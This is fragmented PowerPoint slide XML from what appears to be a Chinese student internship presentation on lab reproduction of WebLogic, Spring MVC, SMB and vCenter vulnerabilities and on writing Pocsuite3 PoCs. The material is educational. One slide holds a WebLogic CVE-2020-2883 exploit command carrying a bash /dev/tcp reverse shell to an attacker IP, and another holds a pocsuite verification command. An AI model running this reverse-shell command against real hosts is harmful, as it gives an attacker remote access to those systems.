              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p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python weblogic-2883.py -u http://123.58.224.8:31898/ -c "bash -i &gt;&amp; /dev/tcp/192.168.188.128/16666 0&gt;&amp;1"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F050202020403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720840" y="1734185"/>
            <a:ext cx="4916805" cy="3632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成功反弹shell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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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2955" y="4587875"/>
            <a:ext cx="5271135" cy="859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0" y="2848610"/>
            <a:ext cx="5236845" cy="205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组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2602052" y="307928"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr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2796386" y="417310"/>
              <a:ext cx="7088135" cy="2768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  <a:cs typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>weblogic 反序列化漏洞（CVE-2020-2883）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82955" y="1734185"/>
            <a:ext cx="10219690" cy="7804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在攻击机上</a:t>
            </a:r>
            <a:r>
              <a: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配置</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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pocsuite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环境</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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，使用指令pocsuite -r shell.py -u http://123.58.224.8:11071 --verify在目标URL上验证是否存在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 46" descr="屏幕截图 2024-07-24 1539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5" y="2514600"/>
            <a:ext cx="9773920" cy="3194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2955" y="5858510"/>
            <a:ext cx="10219690" cy="7804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4572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POC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2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隶书" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>验证成功</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" alt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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F05020202040302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02052" y="307928"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr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3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2796386" y="417310"/>
              <a:ext cx="7088135" cy="2768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zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:latin typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>weblogic 反序列化漏洞（CVE-2020-2883）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Calibri" panose="020F0502020204030204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>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450975" y="152781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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580005" y="850900"/>
            <a:ext cx="7847330" cy="52197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其他关键</a:t>
            </a:r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问题说明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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" name="矩形: 圆角 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193165" y="1951355"/>
            <a:ext cx="10449560" cy="4182745"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 149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90395" y="2163445"/>
            <a:ext cx="9227185" cy="3970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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:latin typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cve-2020-5398</a:t>
            </a:r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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:latin typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Spring MVC_RFD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:latin typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3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其作为反射型文件下载漏洞(RFD)，当响应中设置了“Content-Disposition”头且filename属性是用户可控时容易受到RFD攻击，因此其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利用需要结合社工的方式，让用户下载一个而已文件并执行，从而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危害用户安全。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对此我们也进行了简单的环境搭建与漏洞</a:t>
            </a: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+mn-ea"/>
                <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>复现。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450841" y="587976"/>
            <a:ext cx="882316" cy="882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四</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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2" name="图片 1" descr="屏幕截图 2024-07-23 1505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50975" y="3674110"/>
            <a:ext cx="5782310" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="屏幕截图 2024-07-23 1558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3650" y="3674110"/>
            <a:ext cx="5810250" cy="2175510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="屏幕截图 2024-07-23 1558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5850" y="3674110"/>
            <a:ext cx="4951730" cy="20986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>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445260" y="799465"/>
            <a:ext cx="7847330" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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+mn-ea"/>
              <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形: 圆角 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127760" y="1572260"/>
            <a:ext cx="10021570" cy="4561840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1496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381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  <a:p>
            <a:pPr algn="l" eaLnBrk="1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随着漏洞类型的日益复杂化，漏洞检测设备的局限性也越来越突出。很多漏洞无法通过现有的安全设备检测出来或不能够及时、有效的检测出来，此时需要通过POC漏洞检测技术，通过对检测目标发送此代码或数据后，通过被检测目标返回的信息特殊性，判断漏洞的实际存在与否。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  <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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  <a:p>
            <a:pPr algn="l" eaLnBrk="1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这次项目中，我们通过漏洞分析、复现、验证和编写POC代码等方面具备了深入理解漏洞的能力，并能够运用各种工具和技术来验证漏洞的存在性。同时各成员之间建立了良好的沟通与协作机制，合理分工，高效地共同完成项目任务。通过积极的协作和信息交流，团队成员之间不断提升互相促进。面对遇到的挑战和问题，能够迅速定位并能够采用创造性的方法</a:t>
            </a:r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及时交流项目进展、困难和解决方案</a:t>
            </a:r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，确保项目的顺利进行。并</a:t>
            </a:r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在项目中恪守专业规范，确保报告的准确性和完整性。对漏洞信息的收集和整理细致，注重细节问题的解决，并在报告中以准确、简洁的语言表达自己的观点和发现，</a:t>
            </a:r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最终</a:t>
            </a:r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取得了良好的成果。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  <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr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概而言之，这次实验不仅培养了我们</a:t>
            </a:r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独立思考和分析问题的能力，更</a:t>
            </a:r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获得了实践经验，还促使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>我们积极关注最新的安全技术和相关研究成果，以不断提升自己的专业能力和知识水平。</a:t>
            </a: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  <a:p>
            <a:pPr algn="l" eaLnBrk="1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  <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程图: 离页连接符 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572635" y="884555"/>
            <a:ext cx="3327400" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartOffpage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ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>心得体会</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0"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1450841" y="587976"/>
            <a:ext cx="882316" cy="882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伍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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77415" y="1472565"/>
            <a:ext cx="9483090" cy="3629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项目任务概述</a:t>
            </a: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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pP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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pP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项目小组分工及安排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endParaRPr lang="zh-CN" altLang="en-US" sz="16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1267961" y="1472531"/>
            <a:ext cx="882316" cy="882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一</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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268095" y="3991610"/>
            <a:ext cx="882015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二</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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5191125" y="3592195"/>
            <a:ext cx="237490" cy="2008505"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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91439" tIns="45719" rIns="91439" bIns="45719" numCol="1" spcCol="38100" rtlCol="0" anchor="t" forceAA="0">
            <a:noAutofit/>
          </a:bodyPr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0215" y="3549650"/>
            <a:ext cx="6130290" cy="15570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SMB远程代码执行漏洞复现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+POC+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内容整理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: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王峥</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" alt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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>、陈恩宝</a:t>
            </a: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b="1"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>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>VMware vCenter Server远程代码执行漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>复现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>+POC+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>内容整理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>王承铃、陈恩宝、李佳璐</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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altLang="en-US" sz="2000" b="1"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000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Weblogic 反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>复现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>+POC+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>内容整理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>王峥、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>李佳璐</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"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78755" y="1416685"/>
            <a:ext cx="6614795" cy="16306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000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实习实训项目旨在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>复现、验证漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并在此过程中巩固学习渗透利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>工具的使用方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1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b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>抓包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技巧等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>复现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞进一步</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了解漏洞的形成原因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，明确其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通用性和延续性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写基于Python 的Pocsuite3格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC代码，最终撰写报告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行汇报展示。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
              <a:sym typeface="+mn-e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791075"/>
            <a:ext cx="5504180" cy="4965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hanks for Watching"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3849370" y="2760980"/>
            <a:ext cx="5655945" cy="55372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 algn="ctr">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="59595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dirty="0"/>
              <a:t>Thanks for Watching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55158" y="332780"/>
            <a:ext cx="9882052" cy="501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665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2665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86062" y="1226305"/>
            <a:ext cx="8207032" cy="3383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项目任务概述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altLang="zh-CN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项目小组分工及安排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项目完成情况的思考与复盘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1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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2135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其他关键事项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2135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defTabSz="1219200">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2135" b="1" dirty="0"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2135" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>团队心得体会</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="213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38041" y="999456"/>
            <a:ext cx="882316" cy="8823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dirty="0">
                <a:latin typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>三</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="思源黑体 CN Medium" panose="020B06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791075"/>
            <a:ext cx="5504180" cy="4965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91030" y="1285875"/>
            <a:ext cx="40640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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目完成情况的思考与复盘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2" name="右箭头 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157480" y="3711575"/>
            <a:ext cx="2058035" cy="960755"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="95D4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漏洞信息收集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燕尾形箭头 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2139315" y="2313940"/>
            <a:ext cx="2875280" cy="1278890"/>
          </a:xfrm>
          <a:prstGeom prst="notched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搭建漏洞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复现环境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右箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5116830" y="3711575"/>
            <a:ext cx="2058035" cy="960755"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="72C59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漏洞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复现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燕尾形箭头 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200900" y="2150110"/>
            <a:ext cx="2875280" cy="1278890"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow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编写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poc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并验证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右箭头 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10076180" y="3685540"/>
            <a:ext cx="2058035" cy="960755"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="72C59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复盘总结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5" name="1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405765" y="2329180"/>
            <a:ext cx="1562100" cy="2317115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="36195" bIns="36195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查阅漏洞公告、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cve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报告等文章获取有关漏洞的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信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2382520" y="3745230"/>
            <a:ext cx="2319020" cy="2405380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="36195" bIns="36195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根据漏洞公告指定的版本，搭建特定版本的环境。例如使用 Docker 搭建目标系统的特定版本，或搭建虚拟靶机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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4" name="1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241290" y="2313940"/>
            <a:ext cx="1562100" cy="1416050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="36195" bIns="36195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使用攻击机针对目标系统进行漏洞测试和利用尝试。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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7" name="1111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7322820" y="3745230"/>
            <a:ext cx="2319020" cy="2405380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
